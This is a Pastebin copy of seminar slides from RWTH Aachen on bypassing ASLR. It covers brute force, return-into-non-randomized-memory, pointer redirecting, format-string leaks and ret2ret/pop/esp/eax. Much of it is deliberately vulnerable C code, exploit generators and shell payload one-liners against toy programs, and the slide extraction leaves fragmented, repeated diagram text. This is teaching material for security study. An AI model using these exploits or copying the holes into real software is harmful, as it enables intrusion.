Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Computer Science, Informatik 4
- Communication and Distributed Systems
- ASLR
- Address Space Layout Randomization
- Seminar on Advanced Exploitation Techniques
- Chair of Computer Science 4
- RWTH Aachen
- Tilo Müller
- Computer Science, Informatik 4
- Communication and Distributed Systems
- What is ASLR?
- - A security technology to prevent exploitation of buffer overflows
- - Most popular alternative: Nonexecutable stack
- - Enabled by default since Kernel 2.6.12 (2005) / Vista Beta 2 (2006)
- - Earlier third party implementations: PaX (since 2000)
- Computer Science, Informatik 4
- Communication and Distributed Systems
- How does ASLR work?
- - ASLR = Address Space Layout Randomization
- - Aim: Introduce randomness into the address space of each instantiation
- (24 bits of a 32-bit address are randomized)
- → Addresses of infiltrated shellcode are not predictive anymore
- → Common Exploitation techniques fail, because the place of the shellcode
- is unknown
- 1 st inst. 2 st inst.
- bfaa2e58
- bf9114c8
- process
- memory
- process
- memory
- stack
- ...
- ...
- bfaa2e14
- bfaa2e10
- bf911484
- bf911480
- Computer Science, Informatik 4
- Communication and Distributed Systems
- How does ASLR work?
- unsigned long getEBP(void) {
- __asm__(“movl %ebp,%eax”);
- }
- int main(void) {
- printf(“EBP: %x\n”,getEBP());
- }
- getEBP.c
- Demonstration:
- > ./getEBP
- EBP:bffff3b8
- > ./getEBP
- EBP:bffff3b8
- ASLR disabled:
- > ./getEBP
- EBP:bfaa2e58
- > ./getEBP
- EBP:bf9114c8
- ASLR enabled:
- Computer Science, Informatik 4
- Communication and Distributed Systems
- What is randomized?
- - Only the stack and libraries
- e.g. not the heap, text, data and bss segment
- Demonstration:
- > cat /proc/self/maps | egrep '(libc|heap|stack)'
- 0804d000-0806e000 rw-p 0804d000 00:00 0 [heap]
- b7e5e000-b7fa5000 r-xp 00000000 08:01 1971213 /lib/i686/cmov/libc-2.7.so
- b7fa5000-b7fa6000 r--p 00147000 08:01 1971213 /lib/i686/cmov/libc-2.7.so
- b7fa6000-b7fa8000 rw-p 00148000 08:01 1971213 /lib/i686/cmov/libc-2.7.so
- bfa0d000-bfa22000 rw-p bffeb000 00:00 0 [stack]
- cat /proc/self/maps | egrep '(libc|heap|stack)'
- 0804d000-0806e000 rw-p 0804d000 00:00 0 [heap]
- b7da0000-b7ee7000 r-xp 00000000 08:01 1971213 /lib/i686/cmov/libc-2.7.so
- b7ee7000-b7ee8000 r--p 00147000 08:01 1971213 /lib/i686/cmov/libc-2.7.so
- b7ee8000-b7eea000 rw-p 00148000 08:01 1971213 /lib/i686/cmov/libc-2.7.so
- bfa86000-bfa9b000 rw-p bffeb000 00:00 0 [stack]
- Computer Science, Informatik 4
- Communication and Distributed Systems
- Overview of ASLR resistant exploits
- 1. Brute force
- 2. Return into non-randomized memory
- 3. Pointer redirecting
- 4. Stack divulging methods
- 5. Stack juggling methods
- More methods can be found in the paper (e.g. GOT hijacking or overwriting .dtors)
- Computer Science, Informatik 4
- Communication and Distributed Systems
- 1. Bruteforce
- Success of bruteforce is based on:
- - The tolerance of an exploit to variations in the address space layout
- (e.g. how many NOPs can be placed in the buffer)
- - How many exploitation attempts can be performed
- (e.g. it is necessary that a network daemon restarts after crash)
- - How fast the exploitation attempts can be performed
- (e.g. locally vs. over network)
- void function(char *args) {
- char buff[4096];
- strcpy(buff, args);
- }
- int main(int argc, char *argv[]) {
- function(argv[1]);
- return 0;
- }
- vuln.c Example:
- Computer Science, Informatik 4
- Communication and Distributed Systems
- 1. Bruteforce
- EBP →
- RIP/ bf...
- 4096
- byte
- ESP →
- shell-
- code
- ...
- NOPs
- plausible
- value
- RIP/ bf...
- shell-
- code
- ...
- NOPs
- RIP/ bf...
- shell-
- code
- ...
- NOPs
- miss
- miss
- hit
- 1 2 3
- Computer Science, Informatik 4
- Communication and Distributed Systems
- 1. Bruteforce
- Chance: 1 to 2 24 /4096 = 4096 → 2048 attempts on average
- Solution: Upgrade to a 64-bit architecture
- #! /bin/sh
- while [ 0 ]; do
- ./vuln `./exploit $i`
- i=$(($i + 2048))
- if [ $i –gt 16777216 ]; then
- i=0
- fi
- done;
- It takes about 3 minutes on a 1.5 GHz CPU to get the exploit working:
- ...
- Return Address: 0xbfa38901
- ./bruteforce.sh: line 9: 19081 Segmentation fault
- Return Address: 0xbfa39101
- sh-3.1$
- Examplary bruteforce attack:
- Computer Science, Informatik 4
- Communication and Distributed Systems
- Overview
- 1. Brute force
- 2. Return into non-randomized memory
- 3. Pointer redirecting
- 4. Stack divulging methods
- 5. Stack juggling methods
- Computer Science, Informatik 4
- Communication and Distributed Systems
- 2. Return into non-randomized memory
- not
- randomized
- randomized
- → Exploitation Techniques:
- ret2heap
- ret2bss
- ret2data
- ret2text
- - Stack: parameters and dynamic local variables
- - Heap: dynamically created data structures (malloc)
- - BSS: uninitialized global and static local variables
- - Data: initialized global and static local variables
- - Text: readonly program code
- Computer Science, Informatik 4
- Communication and Distributed Systems
- 2a. ret2text
- The text region is marked readonly
- → it is just possible to manipulate the program flow
- (advanced: borrowed code)
- void public(char* args) {
- char buff[12];
- strcpy(buff,args);
- printf(“public\n”);
- }
- void secret(void) {
- printf(“secret\n”);
- }
- int main(int argc, char* argv[]) {
- if (getuid() == 0) secret();
- else public(argv[1]);
- }
- vuln.c
- Example:
- Computer Science, Informatik 4
- Communication and Distributed Systems
- 2a. ret2text
- #! /bin/bash
- ./vuln `perl -e 'print "A"x16; print "\xfa\x83\x04\x08"'`
- exploit.sh
- ...
- stack
- text
- RIP / 0x080483fa
- SFP / AAAA
- buff / AAAA
- 0x080483fa: void secret(void)
- Computer Science, Informatik 4
- Communication and Distributed Systems
- 2b. ret2bss
- char globalbuf[256];
- void function(char* input) {
- char localbuf[256];
- strcpy(localbuf, input);
- strcpy(globalbuf, localbuf);
- }
- int main(int argc, char** argv) {
- function(argv[1]);
- }
- vuln.c
- - The bss segment contains the uninitialized global variables:
- - Two buffers are needed, one on the stack and one in the bss segment
- Computer Science, Informatik 4
- Communication and Distributed Systems
- 2b. ret2bss
- ...
- stack
- (randomized)
- bss
- (not
- randomized)
- 0x080495e0
- AAAA
- AAAA
- 0x080495e0:
- global
- buff
- local
- buff
- shellcode
- shellcode
- AAAA
- RIP
- SFP
- Computer Science, Informatik 4
- Communication and Distributed Systems
- 2c. ret2data
- 2d. ret2heap
- Similar to ret2bss. Examples of vulnerable code:
- - Data: Initialized global variables
- - Heap: Dynamically created data structures
- char* globalbuf = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
- AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA”;
- void function(char* input) {
- char localbuf[256];
- strcpy(localbuf, input);
- strcpy(globalbuf, localbuf);
- }
- void function(char* input) {
- char local_buff[256];
- char *heap_buff;
- strcpy(local_buff,input);
- heap_buff = (char *) malloc(sizeof(local_buff));
- strcpy(heap_buff,local_buff);
- }
- Computer Science, Informatik 4
- Communication and Distributed Systems
- Overview
- 1. Brute force
- 2. Return into non-randomized memory
- 3. Pointer redirecting
- 4. Stack divulging methods
- 5. Stack juggling methods
- Computer Science, Informatik 4
- Communication and Distributed Systems
- 3. Pointer redirecting
- - Hardcoded strings are saved within non-randomized areas
- → It is possible to redirect a string pointer to another one
- - Interesting string pointers are arguments of system, execve, ...
- - Example:
- int main(int argc, char* args[]) {
- char input[256];
- char *conf = "test -f ~/.progrc";
- char *license = "THIS SOFTWARE IS PROVIDED...\n";
- printf(license);
- strcpy(input,args[1]);
- if (system(conf)) printf("Error: missing .progrc\n");
- }
- vuln.c
- Goal: Execute system(“THIS SOFTWARE IS...\n”);
- → system tries to execute THIS → write a script called THIS, e.g.:
- #! /bin/bash
- /bin/bash
- Computer Science, Informatik 4
- Communication and Distributed Systems
- 3. Pointer redirecting
- ...
- stack
- data
- input
- *conf
- *license 0x08048562
- 0x08048550
- THIS SOFTWARE
- IS ...
- test -f
- ~/.progrc
- system(conf)
- =
- system(“test -f ~/.progrc”)
- Computer Science, Informatik 4
- Communication and Distributed Systems
- 3. Pointer redirecting
- ...
- stack
- data
- input
- *conf
- *license 0x08048562
- 0x08048562
- THIS SOFTWARE
- IS ...
- test -f
- ~/.progrc
- system(conf)
- =
- system(“THIS SOFTWARE IS...”)
- AAAA
- Computer Science, Informatik 4
- Communication and Distributed Systems
- 3. Pointer redirecting
- int main(int argc, char* args[]) {
- char input[256];
- char *conf = "test -f ~/.progrc";
- char *license = "THIS SOFTWARE IS PROVIDED...\n";
- printf(license);
- strcpy(input,args[1]);
- if (system(conf)) printf("Error: missing .progrc\n");
- }
- vuln.c
- #! /bin/sh
- echo "/bin/sh" > THIS
- chmod 777 THIS
- PATH=.:$PATH
- ./vuln `perl -e 'print "A"x256; print "\x62\x85\x04\x08"x2'`
- exploit.sh
- Computer Science, Informatik 4
- Communication and Distributed Systems
- Overview
- 1. Brute force
- 2. Return into non-randomized memory
- 3. Pointer redirecting
- 4. Stack divulging methods
- 5. Stack juggling methods
- Computer Science, Informatik 4
- Communication and Distributed Systems
- 4. Stack divulging methods
- #define SA struct sockaddr
- int listenfd, connfd;
- void function(char* str) {
- char readbuf[256];
- char writebuf[256];
- strcpy(readbuf,str);
- sprintf(writebuf,readbuf);
- write(connfd,writebuf,strlen(writebuf));
- }
- int main(int argc, char* argv[]) {
- char line[1024];
- struct sockaddr_in servaddr;
- ssize_t n;
- listenfd = socket (AF_INET, SOCK_STREAM, 0);
- bzero(&servaddr, sizeof(servaddr));
- servaddr.sin_family = AF_INET;
- servaddr.sin_addr.s_addr = htonl(INADDR_ANY);
- servaddr.sin_port = htons(7776);
- bind(listenfd, (SA*)&servaddr, sizeof(servaddr));
- listen(listenfd, 1024);
- for(;;) {
- connfd = accept(listenfd, (SA*)NULL,NULL);
- write(connfd,"> ",2);
- n = read(connfd, line, sizeof(line)-1);
- line[n] = 0;
- function(line);
- close(connfd);
- }
- }
- vuln.c
- - Goal:
- Discover informations about
- the address space layout
- - Possibility 1:
- Stack stethoscope
- (/proc/<pid>/stat)
- - Possibility 2:
- Format string vulnerabilities
- Computer Science, Informatik 4
- Communication and Distributed Systems
- 4a. Stack stethoscope
- - Address of a process stack's bottom:
- 28 th item of /proc/<pid>/stat
- - The remaining stack can be calculated, since offsets are constant
- - The stat-file is readable by every user per default:
- > dir /proc/$(pidof vuln)/stat
- -r--r--r-- 1 2008-02-26 22:01 /proc/12356/stat
- - Disadvantage:Access to the machine is required
- Advantage: ASLR is almost useless if one have this access
- Computer Science, Informatik 4
- Communication and Distributed Systems
- 4a. Stack stethoscope
- stack bottom
- ...
- function
- main
- SFP
- RIP
- readbuf
- writebuf
- constant offset
- (bfe14f30 – bfe14858 = 6d8)
- Computer Science, Informatik 4
- Communication and Distributed Systems
- 4a. Stack stethoscope
- stack bottom
- function
- main
- SFP
- RIP
- readbuf
- writebuf shellcode
- sb - offset
- sb = cat /proc/$(pidof vuln)/stat | awk '{ print $28 }'
- offset = 6d8
- ...
- Computer Science, Informatik 4
- Communication and Distributed Systems
- 4b. Format strings
- #define SA struct sockaddr
- int listenfd, connfd;
- void function(char* str) {
- char readbuf[256];
- char writebuf[256];
- strcpy(readbuf,str);
- sprintf(writebuf,readbuf);
- write(connfd,writebuf,strlen(writebuf));
- }
- int main(int argc, char* argv[]) {
- char line[1024];
- struct sockaddr_in servaddr;
- ssize_t n;
- listenfd = socket (AF_INET, SOCK_STREAM, 0);
- bzero(&servaddr, sizeof(servaddr));
- servaddr.sin_family = AF_INET;
- servaddr.sin_addr.s_addr = htonl(INADDR_ANY);
- servaddr.sin_port = htons(7776);
- bind(listenfd, (SA*)&servaddr, sizeof(servaddr));
- listen(listenfd, 1024);
- for(;;) {
- connfd = accept(listenfd, (SA*)NULL,NULL);
- write(connfd,"> ",2);
- n = read(connfd, line, sizeof(line)-1);
- line[n] = 0;
- function(line);
- close(connfd);
- }
- }
- vuln.c
- ← Format string vulnerability,
- that can be used to receive
- stack addresses
- Correct:
- sprintf(writebuf,”%s”,readbuf);
- Advantage:
- No access to the machine is
- required.
- Computer Science, Informatik 4
- Communication and Distributed Systems
- sprintf() function()
- SFP
- RIP
- %20$x
- ...
- ...
- bfb71ec8
- 20 th parameter above the format string
- ...
- stack bottom
- constant offset
- bfb72550 - bfb71ec8 = 688
- 4b. Format strings
- → The stack bottom can be calculated by an
- exploitation of the format string vulnerability
- → Afterwards the exploit from the stethoscope
- attack can be used again
- Example:
- > echo "%20\$x" | \
- > nc localhost 7776
- > bfb71ec8
- Computer Science, Informatik 4
- Communication and Distributed Systems
- Overview
- 1. Brute force
- 2. Return into non-randomized memory
- 3. Pointer redirecting
- 4. Stack divulging methods
- 5. Stack juggling methods
- Computer Science, Informatik 4
- Communication and Distributed Systems
- Based on a pointer that is a potential pointer to the shellcode.
- SFP
- RIP
- buff
- Pointer
- ...
- 5a. ret2ret
- Computer Science, Informatik 4
- Communication and Distributed Systems
- A potential pointer points to the shellcode if its last significant byte is
- overwritten by zero (string termination).
- But how to use this aligned pointer as return instruction pointer?
- ??
- Pointer x00
- ??
- buff
- NOPs
- ...
- shellcode
- ...
- 5a. ret2ret
- Computer Science, Informatik 4
- Communication and Distributed Systems
- Solution: chain of ret's.
- ret can be found in the text segment (which is not randomized)
- &ret
- Pointer x00
- &ret
- buff
- NOPs
- ...
- shellcode
- ...
- 5a. ret2ret
- Computer Science, Informatik 4
- Communication and Distributed Systems
- &ret
- Pointer x00
- &ret
- buff
- NOPs
- ...
- shellcode
- ...
- 5a. ret2ret
- ESP →
- EIP →
- EBP →
- b()
- a()
- leave
- = movl %ebp,%esp
- popl %ebp
- ret
- = popl %eip
- function epliogue of b:
- Computer Science, Informatik 4
- Communication and Distributed Systems
- &ret
- Pointer x00
- &ret
- buff
- NOPs
- ...
- shellcode
- ...
- 5a. ret2ret
- ESP →
- EIP →
- EBP →
- b()
- a()
- leave
- = movl %ebp,%esp
- popl %ebp
- ret
- = popl %eip
- Computer Science, Informatik 4
- Communication and Distributed Systems
- &ret
- Pointer x00
- &ret
- buff
- NOPs
- ...
- shellcode
- ...
- 5a. ret2ret
- ESP →
- EIP →
- EBP → ???
- b()
- a()
- leave
- = movl %ebp,%esp
- popl %ebp
- ret
- = popl %eip
- Computer Science, Informatik 4
- Communication and Distributed Systems
- &ret
- Pointer x00
- &ret
- buff
- NOPs
- ...
- shellcode
- ...
- 5a. ret2ret
- ESP →
- EIP →
- EBP → ???
- b()
- a()
- leave
- = movl %ebp,%esp
- popl %ebp
- ret
- = popl %eip
- Computer Science, Informatik 4
- Communication and Distributed Systems
- &ret
- Pointer x00
- &ret
- buff
- NOPs
- ...
- shellcode
- ...
- 5a. ret2ret
- ESP →
- EIP →
- EBP → ???
- b()
- a()
- leave
- = movl %ebp,%esp
- popl %ebp
- ret
- = popl %eip
- Computer Science, Informatik 4
- Communication and Distributed Systems
- &ret
- Pointer x00
- &ret
- buff
- NOPs
- ...
- shellcode
- ...
- 5a. ret2ret
- ESP →
- EIP →
- EBP → ???
- b()
- a()
- leave
- = movl %ebp,%esp
- popl %ebp
- ret
- = popl %eip
- Computer Science, Informatik 4
- Communication and Distributed Systems
- &ret
- Pointer x00
- &ret
- buff
- NOPs
- ...
- shellcode
- ...
- 5a. ret2ret
- ESP →
- EIP →
- EBP → ???
- b()
- a()
- leave
- = movl %ebp,%esp
- popl %ebp
- ret
- = popl %eip
- Computer Science, Informatik 4
- Communication and Distributed Systems
- &ret
- Pointer x00
- &ret
- buff
- NOPs
- ...
- shellcode
- ...
- 5a. ret2ret
- ESP →
- EIP →
- EBP → ???
- b()
- a()
- leave
- = movl %ebp,%esp
- popl %ebp
- ret
- = popl %eip
- Computer Science, Informatik 4
- Communication and Distributed Systems
- vuln.c
- #define RET 0x0804840f
- int main(void) {
- char *buff, *ptr;
- long *adr_ptr;
- int buf_size = 280;
- int ret_size = 20;
- buff = malloc(buf_size);
- ptr = buff;
- adr_ptr = (long *) ptr;
- for (i=0; i<buf_size; i+=4)
- *(adr_ptr++) = RET;
- for (i=0; i<buf_size-ret_size; i++)
- buff[i] = NOP;
- ptr = buff +
- (buf_size-ret_size-
- strlen(shellcode));
- for (i=0; i<strlen(shellcode); i++)
- *(ptr++) = shellcode[i];
- buff[buf_size] = '\0';
- printf("%s",buff);
- return 0;
- }
- exploit.c
- void function(char* overflow) {
- char buffer[256];
- strcpy(buffer, overflow);
- }
- int main(int argc, char** argv) {
- int no = 1;
- int* ptr = &no;
- function(argv[1]);
- return 1;
- }
- 5a. ret2ret
- Computer Science, Informatik 4
- Communication and Distributed Systems
- After strcpy the shellcode is stored redundant in the memory.
- Idea: Use a perfect pointer to the shellcode placed in argv.
- SFP
- RIP
- buff
- Pointer
- argv
- shellcode
- ...
- 5b. ret2pop
- EIP =
- Computer Science, Informatik 4
- Communication and Distributed Systems
- Problem: Avoid overwriting the last significant byte of the perfect pointer
- by zero.
- SFP
- RIP
- buff
- argv
- Pointer x00
- X
- 5b. ret2pop
- ...
- shellcode
- Computer Science, Informatik 4
- Communication and Distributed Systems
- Solution: A ret-chain followed by pop-ret.
- The pop instruction skips over the memory location which is overwritten
- by zero.
- ...
- &ret
- buff
- Pointer
- x00
- shellcode
- &pop-ret
- ...
- 5b. ret2pop
- argv
- ...
- shellcode
- Computer Science, Informatik 4
- Communication and Distributed Systems
- vuln.c
- #define POPRET 0x08048467
- #define RET 0x08048468
- int main(void) {
- char *buff, *ptr;
- long *adr_ptr;
- int i;
- buff = malloc(264);
- for (i=0; i<264; i++)
- buff[i] = 'A';
- ptr = buff+260;
- adr_ptr = (long *) ptr;
- for (i=260; i<264; i+=4)
- if (i == 260) *(adr_ptr++) = POPRET;
- else *(adr_ptr++) = RET;
- ptr = buff;
- for (i=0; i<strlen(shellcode); i++)
- *(ptr++) = shellcode[i];
- buff[264] = '\0';
- printf("%s",buff);
- return 0;
- }
- int function(int x, char *str) {
- char buf[256];
- strcpy(buf,str);
- return x;
- }
- int main(int argc, char **argv) {
- function(64, argv[1]);
- return 1;
- }
- exploit.c
- 5b. ret2pop
- Computer Science, Informatik 4
- Communication and Distributed Systems
- The position of the ESP is predictable during the function epilogue.
- → jmp *%esp
- EBP ➔
- ESP ➔
- SFP
- RIP
- buff
- 5c. ret2esp
- Computer Science, Informatik 4
- Communication and Distributed Systems
- The position of the ESP is predictable during the function epilogue.
- → jmp *%esp
- EBP ➔
- ESP ➔
- ...
- buff
- shellcode
- ...
- 5c. ret2esp
- &jmp *%esp
- Computer Science, Informatik 4
- Communication and Distributed Systems
- EBP ➔
- ESP ➔
- ...
- buff
- shellcode
- ...
- 5c. ret2esp
- leave
- = movl %ebp,%esp
- popl %ebp
- ret
- = popl %eip
- stack
- text segment
- function epilogue:
- ← EIP
- jmp *esp
- somewhere:
- ...
- &jmp *%esp
- ...
- Computer Science, Informatik 4
- Communication and Distributed Systems
- EBP ➔ ESP ➔ ...
- buff
- shellcode
- ...
- 5c. ret2esp
- leave
- = movl %ebp,%esp
- popl %ebp
- ret
- = popl %eip
- stack
- text segment
- function epilogue:
- ← EIP
- jmp *esp
- somewhere:
- &jmp *%esp
- Computer Science, Informatik 4
- Communication and Distributed Systems
- EBP ➔ ?
- ESP ➔
- ...
- buff
- shellcode
- ...
- 5c. ret2esp
- leave
- = movl %ebp,%esp
- popl %ebp
- ret
- = popl %eip
- stack
- text segment
- function epilogue:
- ← EIP
- jmp *esp
- somewhere:
- ...
- &jmp *%esp
- ...
- Computer Science, Informatik 4
- Communication and Distributed Systems
- ESP ➔
- ...
- buff
- shellcode
- ...
- 5c. ret2esp
- leave
- = movl %ebp,%esp
- popl %ebp
- ret
- = popl %eip
- stack
- text segment
- function epilogue:
- ← EIP
- jmp *esp
- somewhere:
- EBP ➔ ?
- ...
- &jmp *%esp
- ...
- Computer Science, Informatik 4
- Communication and Distributed Systems
- ESP ➔
- ...
- &jmp *%esp
- buff
- shellcode
- ...
- 5c. ret2esp
- leave
- = movl %ebp,%esp
- popl %ebp
- ret
- = popl %eip
- stack
- text segment
- function epilogue:
- EIP ➔
- jmp *%esp
- somewhere:
- EBP ➔ ?
- Computer Science, Informatik 4
- Communication and Distributed Systems
- 5c. ret2esp
- Problem: jmp *%esp is not produced by gcc
- Solution: Search the hexdump of a binary after e4ff,
- which will be interpreted as jmp *%esp.
- Example: The hardcoded number 58623 dec = e4ff hex
- The chance to find e4ff in practice is increased by the size of a
- binray.
- > hexdump /usr/bin/* | grep e4ff | wc -l
- 1183
- Computer Science, Informatik 4
- Communication and Distributed Systems
- #define JMP2ESP 0x080483e8
- int main(void) {
- char *buff, *ptr;
- long *adr_ptr;
- int i;
- buff = malloc(264);
- ptr = buff;
- adr_ptr = (long *)ptr;
- for (i=0; i<264+strlen(shellcode); i+=4)
- *(adr_ptr++) = JMP2ESP;
- ptr = buff+264;
- for (i=0; i<strlen(shellcode); i++)
- *(ptr++) = shellcode[i];
- buff[264+strlen(shellcode)] = '\0';
- printf("%s",buff);
- return 0;
- }
- void function(char* str) {
- char buf[256];
- strcpy(buf,str);
- }
- int main(int argc, char** argv) {
- int j = 58623;
- function(argv[1]);
- return 1;
- }
- vuln.c
- exploit.c
- 5c. ret2esp
- Computer Science, Informatik 4
- Communication and Distributed Systems
- Return values are stored in EAX.
- → EAX could contain a perfect shellcode pointer after a function
- returns a pointer to user input.
- → Overwrite RIP by a pointer to a call *%eax instruction
- Example:
- strcpy(buf,str) returns a pointer to buf, i.e.
- bufptr = strcpy(buf,str);
- effects EAX and bufptr to point to the same location as buf
- 5d. ret2eax
- vuln.c
- void function(char* str) {
- char buf[256];
- strcpy(buf, str);
- }
- int main(int argc, char **argv) {
- function(argv[1]);
- return 1;
- }
- Computer Science, Informatik 4
- Communication and Distributed Systems
- EBP ➔
- ESP ➔
- RIP
- SFP
- buf
- 5d. ret2eax
- EAX = ?
- void function(char* str) {
- char buf[256];
- strcpy(buf, str);
- }
- int main(int argc, char **argv) {
- function(argv[1]);
- return 1;
- }
- main() function()
- Computer Science, Informatik 4
- Communication and Distributed Systems
- EBP ➔
- ESP ➔
- RIP
- SFP
- buf
- 5d. ret2eax
- EAX = ?
- void function(char* str) {
- char buf[256];
- strcpy(buf, str);
- }
- int main(int argc, char **argv) {
- function(argv[1]);
- return 1;
- }
- main() function() strcpy()
- ...
- SFP
- RIP
- Computer Science, Informatik 4
- Communication and Distributed Systems
- EBP ➔
- ESP ➔
- buf
- 5d. ret2eax
- EAX = ?
- void function(char* str) {
- char buf[256];
- strcpy(buf, str);
- }
- int main(int argc, char **argv) {
- function(argv[1]);
- return 1;
- }
- main() function() strcpy()
- ...
- SFP
- RIP
- &call *%eax
- shellcode
- ...
- ...
- ...
- Computer Science, Informatik 4
- Communication and Distributed Systems
- EBP ➔
- ESP ➔
- buf
- 5d. ret2eax
- EAX →
- void function(char* str) {
- char buf[256];
- strcpy(buf, str);
- }
- int main(int argc, char **argv) {
- function(argv[1]);
- return 1;
- }
- main() function()
- shellcode
- ...
- ...
- ...
- &call *%eax
- Computer Science, Informatik 4
- Communication and Distributed Systems
- EBP ➔
- ESP ➔
- buf
- 5d. ret2eax
- EAX →
- void function(char* str) {
- char buf[256];
- strcpy(buf, str);
- }
- int main(int argc, char **argv) {
- function(argv[1]);
- return 1;
- }
- main() function()
- shellcode
- ...
- ...
- ...
- leave
- = movl %ebp,%esp
- popl %ebp
- ret
- = popl %eip
- ← EIP
- &call *%eax
- Computer Science, Informatik 4
- Communication and Distributed Systems
- EBP ➔ ESP ➔
- buf
- 5d. ret2eax
- EAX →
- void function(char* str) {
- char buf[256];
- strcpy(buf, str);
- }
- int main(int argc, char **argv) {
- function(argv[1]);
- return 1;
- }
- main() function()
- shellcode
- ...
- ...
- ...
- leave
- = movl %ebp,%esp
- popl %ebp
- ret
- = popl %eip
- ← EIP
- &call *%eax
- Computer Science, Informatik 4
- Communication and Distributed Systems
- EBP = ?
- ESP ➔
- buf
- 5d. ret2eax
- EAX →
- void function(char* str) {
- char buf[256];
- strcpy(buf, str);
- }
- int main(int argc, char **argv) {
- function(argv[1]);
- return 1;
- }
- main() function()
- shellcode
- ...
- ...
- ...
- leave
- = movl %ebp,%esp
- popl %ebp
- ret
- = popl %eip
- ← EIP
- &call *%eax
- Computer Science, Informatik 4
- Communication and Distributed Systems
- EBP = ?
- ESP ➔
- buf
- 5d. ret2eax
- EAX →
- void function(char* str) {
- char buf[256];
- strcpy(buf, str);
- }
- int main(int argc, char **argv) {
- function(argv[1]);
- return 1;
- }
- main() function()
- shellcode
- ...
- ...
- ...
- &call *%eax
- leave
- = movl %ebp,%esp
- popl %ebp
- ret
- = popl %eip
- ← EIP
- call *%eax
- Computer Science, Informatik 4
- Communication and Distributed Systems
- EBP = ?
- ESP ➔
- buf
- 5d. ret2eax
- EAX →
- void function(char* str) {
- char buf[256];
- strcpy(buf, str);
- }
- int main(int argc, char **argv) {
- function(argv[1]);
- return 1;
- }
- main() function()
- shellcode
- ...
- ...
- ...
- &call *%eax
- leave
- = movl %ebp,%esp
- popl %ebp
- ret
- = popl %eip
- call *%eax
- EIP →
- Computer Science, Informatik 4
- Communication and Distributed Systems
- EBP = ?
- ESP ➔
- buf
- 5d. ret2eax
- EAX →
- void function(char* str) {
- char buf[256];
- strcpy(buf, str);
- }
- int main(int argc, char **argv) {
- function(argv[1]);
- return 1;
- }
- main() function()
- shellcode
- ...
- ...
- ...
- &call *%eax
- leave
- = movl %ebp,%esp
- popl %ebp
- ret
- = popl %eip
- call *%eax
- EIP →
- Computer Science, Informatik 4
- Communication and Distributed Systems
- vuln.c
- #define CALLEAX 0x08048453
- int main(void) {
- char *buff, *ptr;
- long *adr_ptr;
- buff = malloc(264);
- ptr = buff;
- adr_ptr = (long *)ptr;
- for (i=0; i<264; i+=4)
- *(adr_ptr++) = CALLEAX;
- ptr = buff;
- for (i=0; i<strlen(shellcode); i++)
- *(ptr++) = shellcode[i];
- buff[264] = '\0';
- printf("%s",buff);
- }
- exploit.c
- void function(char* str) {
- char buf[256];
- strcpy(buf, str);
- }
- int main(int argc, char **argv) {
- function(argv[1]);
- }
- 5d. ret2eax
- > objdump -D vuln | grep -B 2 "call"
- 804844f: 74 12 je 8048463
- 8048451: 31 db xor %ebx,%ebx
- 8048453: ff d0 call *%eax
- Find &call *%eax:
- Computer Science, Informatik 4
- Communication and Distributed Systems
- Summary
- 1. Brute force
- 2. Return into non-randomized memory
- a) ret2text
- b) ret2bss
- c) ret2data
- d) ret2heap
- 3. Pointer redirecting
- a) String pointer
- 4. Stack divulging methods
- a) Stack stethoscope
- b) Formatstring vulnerabilities
- 5. Stack juggling methods
- a) ret2ret
- b) ret2pop
- c) ret2esp
- d) ret2eax
- Computer Science, Informatik 4
- Communication and Distributed Systems
- Summary
- 1. Brute force
- 2. Return into non-randomized memory
- a) ret2text
- b) ret2bss
- c) ret2data
- d) ret2heap
- 3. Pointer redirecting
- a) String pointer
- 4. Stack divulging methods
- a) Stack stethoscope
- b) Formatstring vulnerabilities
- 5. Stack juggling methods
- a) ret2ret
- b) ret2pop
- c) ret2esp
- d) ret2eax
- Additional in the paper:
- - DoS by format string vulnerabilities
- - Redirecting function pointers
- - Integer overflows
- - GOT and PLT hijacking
- - Off by one
- - Overwriting .dtors
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement